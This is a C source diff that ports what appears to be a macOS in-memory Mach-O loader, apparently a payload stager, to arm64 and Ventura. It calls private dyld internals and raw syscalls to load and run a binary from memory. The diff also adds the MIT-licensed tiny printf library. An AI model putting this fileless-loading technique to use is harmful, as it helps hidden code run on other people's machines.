+        ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", offset2);
        struct DyldCacheDataConstLazyScopedWriter dcdclsw = { apis, false };
        for (int i = 0; i != newLoadersCount; ++i) {
-#ifdef DEBUG
          print("Fixing Up!\n");
-#endif
          void * ldr = newLoaders[i];
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Ldr: %lld\n", ldr);
-#endif
+          printf("Ldr: %lld\n", ldr);
          ApplyFixups_func(ldr, diag, apis, &dcdclsw, true);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Diag: %lld\n", diag->_buffer);
-#endif
+          printf("Diag: %lld\n", diag->_buffer);
        }
        // TODO: Figure out if we need addPermanentRanges.
-        NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
        NotifyDtrace_func(apis, &newLoadersArray);
-        RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
        RebindMissingFlatLazySymbols_func(apis, &newLoadersArray);
        for (int i = 0; i != newLoadersCount; ++i) {
          void * ldr = newLoaders[i];
-#ifdef DEBUG
          print("Setting up locals.\n");
-#endif
-          GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", sdyld);
+          GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", offset2);
          const void* * ma = GetMA_func(ldr, apis);
-          HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", sdyld);
+          HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", offset2);
          if (HasThreadLocalVariables_func(ma) == true) {
-#ifdef DEBUG
            print("Has local variables.\n");
-#endif
-            SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", sdyld);
+            SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", offset2);
            SetUpTLVs_func(apis, ma);
          }
        };
      }
-      IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", sdyld);
+      IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", offset2);
      IncDlRefCount_func(apis, topLoader);
-#ifdef DEBUG
      print("Notifying.\n");
-#endif
-      NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+      NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
      NotifyLoad_func(apis, &newLoadersArray);
-#ifdef DEBUG
      print("Initializing\n");
-#endif
-      RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", sdyld);
+      RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", offset2);
      RunInitializers_func(topLoader, apis);
      *rtopLoader = (uint64_t)topLoader;
-    });
+    } else {
+      WithLoadersWriteLock_ptr WithLoadersWriteLock_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState20withLoadersWriteLockEU13block_pointerFvvE", offset2);
+      WithLoadersWriteLock_func(apis, ^(){
+        struct Loaded * loaded = (struct Loaded*)(apis+32);
+        uintptr_t startLoaderCount = loaded->size;
+        printf("Loaded Size: %lld\n", loaded->size);
+        printf("Loaded first: %lld\n", (loaded->elements));
+        printf("Loaded Capacity: %lld\n", loaded->capacity);
+        struct FileID * fileid = (struct FileID *)(rtopLoader+sizeof(void *));// = { 0, 0, false };
+        fileid->iNode = 0;
+        fileid->modTime = 0;
+        fileid->isValid = false;
+        printf("Apis: %lld\n", apis);
+        printf("LoadAddress: %lld\n", loadAddress);
+        printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
+        void * topLoader = JustInTimeLoaderMake_func(apis, (void *)loadAddress, "", fileid, 0, false, true, false, 0, 0);
+        printf("TopLoader: %lld\n", topLoader);
+        printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+        printf("Loaded Size: %lld\n", loaded->size);
+        printf("Loaded Capacity: %lld\n", loaded->capacity);
+        struct PartialLoader * pl = (struct PartialLoader *)topLoader;
+        printf("LoadAddress: %lld\n", pl->mappedAddress);
+        printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+        printf("hidden: %lld\n", pl->hidden);
+        printf("Magic: %lld\n", pl->magic);
+        printf("IsPrebuilt: %lld\n", pl->isPrebuilt);
+        pl->lateLeaveMapped = 1;
+        pl = (struct PartialLoader *)topLoader;
+        printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+        struct LoadChain * loadChainMain = (struct LoadChain *)(fileid+sizeof(struct FileID));// = { 0, *(void **)(apis+24) };
+        loadChainMain->previous = 0;
+        loadChainMain->image = *(void **)(apis+24);
+        printf("mainExecutableLoader: %lld\n", *(void **)(apis+24));
+        printf("mainExecutableLoader: %lld\n", loadChainMain->image);
+        struct LoadChain * loadChainCaller = (struct LoadChain *)(loadChainMain+sizeof(struct LoadChain));// = { &loadChainMain, &(loaded->elements[0]) };
+        loadChainCaller->previous = &loadChainMain;
+        loadChainCaller->image = &(loaded->elements[0]);
+        printf("LoadedElements: %lld\n", &(loaded->elements[0]));
+        printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+        struct LoadChain * loadChain = (struct LoadChain *)(loadChainCaller+sizeof(struct LoadChain));// = { &loadChainCaller, topLoader };
+        loadChain->previous = &loadChainCaller;
+        loadChain->image = topLoader;
+        struct LoadOptions * depOptions = (struct LoadOptions *)(loadChain+sizeof(struct LoadChain));
+        depOptions->staticLinkage    = false;
+        depOptions->rtldLocal        = false; // RTLD_LOCAL only effects top level dylib
+        depOptions->rtldNoDelete     = true;
+        depOptions->canBeDylib       = true;
+        depOptions->rpathStack       = loadChain;
+        depOptions->useFallBackPaths = true;
+        LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", offset2);
+        struct diagnostics * diag = (struct diagnostics *)(depOptions+sizeof(struct LoadOptions));
+        diag->_buffer = 0;
+        LoadDependents_func(topLoader, diag, apis, depOptions);
+        if (diag->_buffer != 0) {
+          print("Error\n");
+        };
+        printf("buffer: %lld\n", diag->_buffer);
+        printf("startLoaderCount: %lld\n", startLoaderCount);
+        uint64_t newLoadersCount = loaded->size - startLoaderCount;
+        printf("newLoadersCount: %lld\n", newLoadersCount);
+        void * * newLoaders = &loaded->elements[startLoaderCount];
+        struct ArrayOfLoaderPointers newLoadersArray = { newLoaders, newLoadersCount, newLoadersCount };
+        if (newLoadersCount != 0) {
+          NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          NotifyDebuggerLoad_func(apis, &newLoadersArray);
+          if (*(char *)(apis + 0x7f) != '\0') {
+            AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKN5dyld35ArrayIPKS0_EE", offset2);
+            AddWeakDefs_func(apis, &newLoadersArray);
+            print("WeakRefed\n");
+          }
+          ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", offset2);
+          struct DyldCacheDataConstLazyScopedWriter dcdclsw = { apis, false };
+          for (int i = 0; i != newLoadersCount; ++i) {
+            print("Fixing Up!\n");
+            void * ldr = newLoaders[i];
+            printf("Ldr: %lld\n", ldr);
+            ApplyFixups_func(ldr, diag, apis, &dcdclsw, true);
+            printf("Diag: %lld\n", diag->_buffer);
+          }
+          // TODO: Figure out if we need addPermanentRanges.
+          NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          NotifyDtrace_func(apis, &newLoadersArray);
+          RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+          RebindMissingFlatLazySymbols_func(apis, &newLoadersArray);
+          for (int i = 0; i != newLoadersCount; ++i) {
+            void * ldr = newLoaders[i];
+            print("Setting up locals.\n");
+            GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", offset2);
+            const void* * ma = GetMA_func(ldr, apis);
+            HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", offset2);
+            if (HasThreadLocalVariables_func(ma) == true) {
+              print("Has local variables.\n");
+              SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", offset2);
+              SetUpTLVs_func(apis, ma);
+            }
+          };
+        }
+        IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", offset2);
+        IncDlRefCount_func(apis, topLoader);
+        print("Notifying.\n");
+        NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", offset2);
+        NotifyLoad_func(apis, &newLoadersArray);
+        print("Initializing\n");
+        RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", offset2);
+        RunInitializers_func(topLoader, apis);
+        *rtopLoader = (uint64_t)topLoader;
+      });
+    }
    uintptr_t flags = 0;
-    void* handle = (void*)((((uintptr_t)*rtopLoader) << 1) | flags);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Handle: %lld\n", handle);
-#endif
-    VMDeallocate_ptr VMDeallocate_func = find_symbol(sdyld, "_vm_deallocate", sdyld);
+    void* handle = 0;
+    if (ventura) {
+      HandleFromLoader_ptr HandleFromLoader_func = find_symbol(sdyld, "__ZN5dyld4L16handleFromLoaderEPKNS_6LoaderEb", offset2);
+      handle = HandleFromLoader_func((void *)*rtopLoader, false);
+    } else {
+      handle = (void*)((((uintptr_t)*rtopLoader) << 1) | flags);
+    }
+    printf("Handle: %lld\n", handle);
+    VMDeallocate_ptr VMDeallocate_func = find_symbol(sdyld, "_vm_deallocate", offset2);
    VMDeallocate_func(mach_task_self, (void *)structspace, structspacesize);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "VMDeallocated: %lld\n", structspace);
-#endif
+    printf("VMDeallocated: %lld\n", structspace);
    NSModule nm = handle;
    NSLookupSymbolInModule_ptr NSLookupSymbolInModule_func = find_symbol(dyld, "_NSLookupSymbolInModule", offset);
    NSSymbol sym_main = NSLookupSymbolInModule_func(nm, "_main");
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "sym_main: %lld\n", sym_main);
-#endif
+    printf("sym_main: %lld\n", sym_main);
    NSAddressOfSymbol_ptr NSAddressOfSymbol_func = find_symbol(dyld, "_NSAddressOfSymbol", offset);
    addr_main = NSAddressOfSymbol_func(sym_main);
  } else {
@@ -683,20 +771,14 @@ int main(int argc, char** argv)
    if (NSCreateObjectFileImageFromMemory_func((void*)buffer, buffer_size, &fi) != 1) {
      return 1;
    }
-#ifdef DEBUG
    print("created!\n");
-#endif

    NSModule nm = NSLinkModule_func(fi, "", NSLINKMODULE_OPTION_PRIVATE | NSLINKMODULE_OPTION_BINDNOW | NSLINKMODULE_OPTION_RETURN_ON_ERROR);
    if (!nm) {
-#ifdef DEBUG
      print("no nm!\n");
-#endif
      return 1;
    }
-#ifdef DEBUG
    print("good nm!\n");
-#endif

    NSSymbol sym_main = NSLookupSymbolInModule_func(nm, "_main");
    if (!sym_main) {
@@ -708,9 +790,7 @@ int main(int argc, char** argv)
      return 1;
    }

-#ifdef DEBUG
    print("found main!\n");
-#endif
  };
  int(*main_func)(int, char**) = (int(*)(int, char**))addr_main;
  char* socket = (char*)(size_t)argc;
@@ -773,6 +853,17 @@ uint64_t syscall_chmod(uint64_t path, long mode)
 {
  uint64_t chmod_no = 0x200000f;
  uint64_t ret = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(chmod_no), "r"(path), "r"(mode)
+      :);
+#else
  __asm__(
      "movq %1, %%rax;\n"
      "movq %2, %%rdi;\n"
@@ -782,6 +873,7 @@ uint64_t syscall_chmod(uint64_t path, long mode)
      : "=g"(ret)
      : "g"(chmod_no), "S"(path), "g"(mode)
      :);
+#endif
  return ret;
 }

@@ -843,6 +935,21 @@ int detect_sierra()
  uint64_t valsizeptr = (uint64_t)&size;
  uint64_t ret = 0;

+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "mov x2, %4;\n"
+      "mov x3, %5;\n"
+      "eor x4, x4, x4;\n"
+      "eor x5, x5, x5;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(sc_sysctl), "r"(nameptr), "r"(namelen), "r"(valptr), "r"(valsizeptr)
+      : );
+#else
  __asm__(
      "mov %1, %%rax;\n"
      "mov %2, %%rdi;\n"
@@ -856,6 +963,7 @@ int detect_sierra()
      : "=g"(ret)
      : "g"(sc_sysctl), "g"(nameptr), "g"(namelen), "g"(valptr), "g"(valsizeptr)
      : );
+#endif

  // osrelease is 16.x.x on Sierra
  if (ret == 0 && size > 2) {
@@ -874,6 +982,16 @@ uint64_t syscall_shared_region_check_np()
  long shared_region_check_np = 0x2000126; // #294
  uint64_t address = 0;
  unsigned long ret = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(shared_region_check_np), "r"(&address)
+      : "x16", "x0" );
+#else
  __asm__(
      "movq %1, %%rax;\n"
      "movq %2, %%rdi;\n"
@@ -882,6 +1000,7 @@ uint64_t syscall_shared_region_check_np()
      : "=g"(ret)
      : "g"(shared_region_check_np), "g"(&address)
      : "rax", "rdi" );
+#endif
  return address;
 }

@@ -916,6 +1035,18 @@ void print(char * str)
  unsigned long long addr = (unsigned long long) str;
  unsigned long ret = 0;
  /* ret = write(stdout, str, len); */
+#ifdef __aarch64__
+  __asm__(
+      "mov x16, %1;\n"
+      "mov x0, %2;\n"
+      "mov x1, %3;\n"
+      "mov x2, %4;\n"
+      "svc #0;\n"
+      "mov %0, x0;\n"
+      : "=r"(ret)
+      : "r"(write), "r"(stdout), "r"(addr), "r"(len)
+      : "x0", "x1", "x2" );
+#else
  __asm__(
      "movq %1, %%rax;\n"
      "movq %2, %%rdi;\n"
@@ -926,5 +1057,6 @@ void print(char * str)
      : "=g"(ret)
      : "g"(write), "g"(stdout), "S"(addr), "g"(len)
      : "rax", "rdi", "rdx" );
+#endif
 }
 #endif
@@ -0,0 +1,914 @@
+///////////////////////////////////////////////////////////////////////////////
+// \author (c) Marco Paland (info@paland.com)
+//             2014-2019, PALANDesign Hannover, Germany
+//
+// \license The MIT License (MIT)
+//
+// Permission is hereby granted, free of charge, to any person obtaining a copy
+// of this software and associated documentation files (the "Software"), to deal
+// in the Software without restriction, including without limitation the rights
+// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+// copies of the Software, and to permit persons to whom the Software is
+// furnished to do so, subject to the following conditions:
+//
+// The above copyright notice and this permission notice shall be included in
+// all copies or substantial portions of the Software.
+//
+// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+// THE SOFTWARE.
+//
+// \brief Tiny printf, sprintf and (v)snprintf implementation, optimized for speed on
+//        embedded systems with a very limited resources. These routines are thread
+//        safe and reentrant!
+//        Use this instead of the bloated standard/newlib printf cause these use
+//        malloc for printf (and may not be thread safe).
+//
+///////////////////////////////////////////////////////////////////////////////
+
+#include <stdbool.h>
+#include <stdint.h>
+
+#include "printf.h"
+
+
+// define this globally (e.g. gcc -DPRINTF_INCLUDE_CONFIG_H ...) to include the
+// printf_config.h header file
+// default: undefined
+#ifdef PRINTF_INCLUDE_CONFIG_H
+#include "printf_config.h"
+#endif
+
+
+// 'ntoa' conversion buffer size, this must be big enough to hold one converted
+// numeric number including padded zeros (dynamically created on stack)
+// default: 32 byte
+#ifndef PRINTF_NTOA_BUFFER_SIZE
+#define PRINTF_NTOA_BUFFER_SIZE    32U
+#endif
+
+// 'ftoa' conversion buffer size, this must be big enough to hold one converted
+// float number including padded zeros (dynamically created on stack)
+// default: 32 byte
+#ifndef PRINTF_FTOA_BUFFER_SIZE
+#define PRINTF_FTOA_BUFFER_SIZE    32U
+#endif
+
+// support for the floating point type (%f)
+// default: activated
+#ifndef PRINTF_DISABLE_SUPPORT_FLOAT
+#define PRINTF_SUPPORT_FLOAT
+#endif
+
+// support for exponential floating point notation (%e/%g)
+// default: activated
+#ifndef PRINTF_DISABLE_SUPPORT_EXPONENTIAL
+#define PRINTF_SUPPORT_EXPONENTIAL
+#endif
+
+// define the default floating point precision
+// default: 6 digits
+#ifndef PRINTF_DEFAULT_FLOAT_PRECISION
+#define PRINTF_DEFAULT_FLOAT_PRECISION  6U
+#endif
+
+// define the largest float suitable to print with %f
+// default: 1e9
+#ifndef PRINTF_MAX_FLOAT
+#define PRINTF_MAX_FLOAT  1e9
+#endif
+
+// support for the long long types (%llu or %p)
+// default: activated
+#ifndef PRINTF_DISABLE_SUPPORT_LONG_LONG
+#define PRINTF_SUPPORT_LONG_LONG
+#endif
+
+// support for the ptrdiff_t type (%t)
+// ptrdiff_t is normally defined in <stddef.h> as long or long long type
+// default: activated
+#ifndef PRINTF_DISABLE_SUPPORT_PTRDIFF_T
+#define PRINTF_SUPPORT_PTRDIFF_T
+#endif
+
+///////////////////////////////////////////////////////////////////////////////
+
+// internal flag definitions
+#define FLAGS_ZEROPAD   (1U <<  0U)
+#define FLAGS_LEFT      (1U <<  1U)
+#define FLAGS_PLUS      (1U <<  2U)
+#define FLAGS_SPACE     (1U <<  3U)
+#define FLAGS_HASH      (1U <<  4U)
+#define FLAGS_UPPERCASE (1U <<  5U)
+#define FLAGS_CHAR      (1U <<  6U)
+#define FLAGS_SHORT     (1U <<  7U)
+#define FLAGS_LONG      (1U <<  8U)
+#define FLAGS_LONG_LONG (1U <<  9U)
+#define FLAGS_PRECISION (1U << 10U)
+#define FLAGS_ADAPT_EXP (1U << 11U)
+
+
+// import float.h for DBL_MAX
+#if defined(PRINTF_SUPPORT_FLOAT)
+#include <float.h>
+#endif
+
+
+// output function type
+typedef void (*out_fct_type)(char character, void* buffer, size_t idx, size_t maxlen);
+
+
+// wrapper (used as buffer) for output function type
+typedef struct {
+  void  (*fct)(char character, void* arg);
+  void* arg;
+} out_fct_wrap_type;
+
+
+// internal buffer output
+static inline void _out_buffer(char character, void* buffer, size_t idx, size_t maxlen)
+{
+  if (idx < maxlen) {
+    ((char*)buffer)[idx] = character;
+  }
+}
+
+
+// internal null output
+static inline void _out_null(char character, void* buffer, size_t idx, size_t maxlen)
+{
+  (void)character; (void)buffer; (void)idx; (void)maxlen;
+}
+
+
+// internal _putchar wrapper
+static inline void _out_char(char character, void* buffer, size_t idx, size_t maxlen)
+{
+  (void)buffer; (void)idx; (void)maxlen;
+  if (character) {
+    _putchar(character);
+  }
+}
+
+
+// internal output function wrapper
+static inline void _out_fct(char character, void* buffer, size_t idx, size_t maxlen)
+{
+  (void)idx; (void)maxlen;
+  if (character) {
+    // buffer is the output fct pointer
+    ((out_fct_wrap_type*)buffer)->fct(character, ((out_fct_wrap_type*)buffer)->arg);
+  }
+}
+
+
+// internal secure strlen
+// \return The length of the string (excluding the terminating 0) limited by 'maxsize'
+static inline unsigned int _strnlen_s(const char* str, size_t maxsize)
+{
+  const char* s;
+  for (s = str; *s && maxsize--; ++s);
+  return (unsigned int)(s - str);
+}
+
+
+// internal test if char is a digit (0-9)
+// \return true if char is a digit
+static inline bool _is_digit(char ch)
+{
+  return (ch >= '0') && (ch <= '9');
+}
+
+
+// internal ASCII string to unsigned int conversion
+static unsigned int _atoi(const char** str)
+{
+  unsigned int i = 0U;
+  while (_is_digit(**str)) {
+    i = i * 10U + (unsigned int)(*((*str)++) - '0');
+  }
+  return i;
+}
+
+
+// output the specified string in reverse, taking care of any zero-padding
+static size_t _out_rev(out_fct_type out, char* buffer, size_t idx, size_t maxlen, const char* buf, size_t len, unsigned int width, unsigned int flags)
+{
+  const size_t start_idx = idx;
+
+  // pad spaces up to given width
+  if (!(flags & FLAGS_LEFT) && !(flags & FLAGS_ZEROPAD)) {
+    for (size_t i = len; i < width; i++) {
+      out(' ', buffer, idx++, maxlen);
+    }
+  }
+
+  // reverse string
+  while (len) {
+    out(buf[--len], buffer, idx++, maxlen);
+  }
+
+  // append pad spaces up to given width
+  if (flags & FLAGS_LEFT) {
+    while (idx - start_idx < width) {
+      out(' ', buffer, idx++, maxlen);
+    }
+  }
+
+  return idx;
+}
+
+
+// internal itoa format
+static size_t _ntoa_format(out_fct_type out, char* buffer, size_t idx, size_t maxlen, char* buf, size_t len, bool negative, unsigned int base, unsigned int prec, unsigned int width, unsigned int flags)
+{
+  // pad leading zeros
+  if (!(flags & FLAGS_LEFT)) {
+    if (width && (flags & FLAGS_ZEROPAD) && (negative || (flags & (FLAGS_PLUS | FLAGS_SPACE)))) {
+      width--;
+    }
+    while ((len < prec) && (len < PRINTF_NTOA_BUFFER_SIZE)) {
+      buf[len++] = '0';
+    }
+    while ((flags & FLAGS_ZEROPAD) && (len < width) && (len < PRINTF_NTOA_BUFFER_SIZE)) {
+      buf[len++] = '0';
+    }
+  }
+
+  // handle hash
+  if (flags & FLAGS_HASH) {
+    if (!(flags & FLAGS_PRECISION) && len && ((len == prec) || (len == width))) {
+      len--;
+      if (len && (base == 16U)) {
+        len--;
+      }
+    }
+    if ((base == 16U) && !(flags & FLAGS_UPPERCASE) && (len < PRINTF_NTOA_BUFFER_SIZE)) {
+      buf[len++] = 'x';
+    }
+    else if ((base == 16U) && (flags & FLAGS_UPPERCASE) && (len < PRINTF_NTOA_BUFFER_SIZE)) {
+      buf[len++] = 'X';
+    }
+    else if ((base == 2U) && (len < PRINTF_NTOA_BUFFER_SIZE)) {
+      buf[len++] = 'b';
+    }
+    if (len < PRINTF_NTOA_BUFFER_SIZE) {
+      buf[len++] = '0';
+    }
+  }
+
+  if (len < PRINTF_NTOA_BUFFER_SIZE) {
+    if (negative) {
+      buf[len++] = '-';
+    }
+    else if (flags & FLAGS_PLUS) {
+      buf[len++] = '+';  // ignore the space if the '+' exists
+    }
+    else if (flags & FLAGS_SPACE) {
+      buf[len++] = ' ';
+    }
+  }
+
+  return _out_rev(out, buffer, idx, maxlen, buf, len, width, flags);
+}
+
+
+// internal itoa for 'long' type
+static size_t _ntoa_long(out_fct_type out, char* buffer, size_t idx, size_t maxlen, unsigned long value, bool negative, unsigned long base, unsigned int prec, unsigned int width, unsigned int flags)
+{
+  char buf[PRINTF_NTOA_BUFFER_SIZE];
+  size_t len = 0U;
+
+  // no hash for 0 values
+  if (!value) {
+    flags &= ~FLAGS_HASH;
+  }
+
+  // write if precision != 0 and value is != 0
+  if (!(flags & FLAGS_PRECISION) || value) {
+    do {
+      const char digit = (char)(value % base);
+      buf[len++] = digit < 10 ? '0' + digit : (flags & FLAGS_UPPERCASE ? 'A' : 'a') + digit - 10;
+      value /= base;
+    } while (value && (len < PRINTF_NTOA_BUFFER_SIZE));
+  }
+
+  return _ntoa_format(out, buffer, idx, maxlen, buf, len, negative, (unsigned int)base, prec, width, flags);
+}
+
+
+// internal itoa for 'long long' type
+#if defined(PRINTF_SUPPORT_LONG_LONG)
+static size_t _ntoa_long_long(out_fct_type out, char* buffer, size_t idx, size_t maxlen, unsigned long long value, bool negative, unsigned long long base, unsigned int prec, unsigned int width, unsigned int flags)
+{
+  char buf[PRINTF_NTOA_BUFFER_SIZE];
+  size_t len = 0U;
+
+  // no hash for 0 values
+  if (!value) {
+    flags &= ~FLAGS_HASH;
+  }
+
+  // write if precision != 0 and value is != 0
+  if (!(flags & FLAGS_PRECISION) || value) {
+    do {
+      const char digit = (char)(value % base);
+      buf[len++] = digit < 10 ? '0' + digit : (flags & FLAGS_UPPERCASE ? 'A' : 'a') + digit - 10;
+      value /= base;
+    } while (value && (len < PRINTF_NTOA_BUFFER_SIZE));
+  }
+
+  return _ntoa_format(out, buffer, idx, maxlen, buf, len, negative, (unsigned int)base, prec, width, flags);
+}
+#endif  // PRINTF_SUPPORT_LONG_LONG
+
+
+#if defined(PRINTF_SUPPORT_FLOAT)
+
+#if defined(PRINTF_SUPPORT_EXPONENTIAL)
+// forward declaration so that _ftoa can switch to exp notation for values > PRINTF_MAX_FLOAT
+static size_t _etoa(out_fct_type out, char* buffer, size_t idx, size_t maxlen, double value, unsigned int prec, unsigned int width, unsigned int flags);
+#endif
+
+
+// internal ftoa for fixed decimal floating point
+static size_t _ftoa(out_fct_type out, char* buffer, size_t idx, size_t maxlen, double value, unsigned int prec, unsigned int width, unsigned int flags)
+{
+  char buf[PRINTF_FTOA_BUFFER_SIZE];
+  size_t len  = 0U;
+  double diff = 0.0;
+
+  // powers of 10
+  static const double pow10[] = { 1, 10, 100, 1000, 10000, 100000, 1000000, 10000000, 100000000, 1000000000 };
+
+  // test for special values
+  if (value != value)
+    return _out_rev(out, buffer, idx, maxlen, "nan", 3, width, flags);
+  if (value < -DBL_MAX)
+    return _out_rev(out, buffer, idx, maxlen, "fni-", 4, width, flags);
+  if (value > DBL_MAX)
+    return _out_rev(out, buffer, idx, maxlen, (flags & FLAGS_PLUS) ? "fni+" : "fni", (flags & FLAGS_PLUS) ? 4U : 3U, width, flags);
+
+  // test for very large values
+  // standard printf behavior is to print EVERY whole number digit -- which could be 100s of characters overflowing your buffers == bad
+  if ((value > PRINTF_MAX_FLOAT) || (value < -PRINTF_MAX_FLOAT)) {
+#if defined(PRINTF_SUPPORT_EXPONENTIAL)
+    return _etoa(out, buffer, idx, maxlen, value, prec, width, flags);
+#else
+    return 0U;
+#endif
+  }
+
+  // test for negative
+  bool negative = false;
+  if (value < 0) {
+    negative = true;
+    value = 0 - value;
+  }
+
+  // set default precision, if not set explicitly
+  if (!(flags & FLAGS_PRECISION)) {
+    prec = PRINTF_DEFAULT_FLOAT_PRECISION;
+  }
+  // limit precision to 9, cause a prec >= 10 can lead to overflow errors
+  while ((len < PRINTF_FTOA_BUFFER_SIZE) && (prec > 9U)) {
+    buf[len++] = '0';
+    prec--;
+  }
+
+  int whole = (int)value;
+  double tmp = (value - whole) * pow10[prec];
+  unsigned long frac = (unsigned long)tmp;
+  diff = tmp - frac;
+
+  if (diff > 0.5) {
+    ++frac;
+    // handle rollover, e.g. case 0.99 with prec 1 is 1.0
+    if (frac >= pow10[prec]) {
+      frac = 0;
+      ++whole;
+    }
+  }
+  else if (diff < 0.5) {
+  }
+  else if ((frac == 0U) || (frac & 1U)) {
+    // if halfway, round up if odd OR if last digit is 0
+    ++frac;
+  }
+
+  if (prec == 0U) {
+    diff = value - (double)whole;
+    if ((!(diff < 0.5) || (diff > 0.5)) && (whole & 1)) {
+      // exactly 0.5 and ODD, then round up
+      // 1.5 -> 2, but 2.5 -> 2
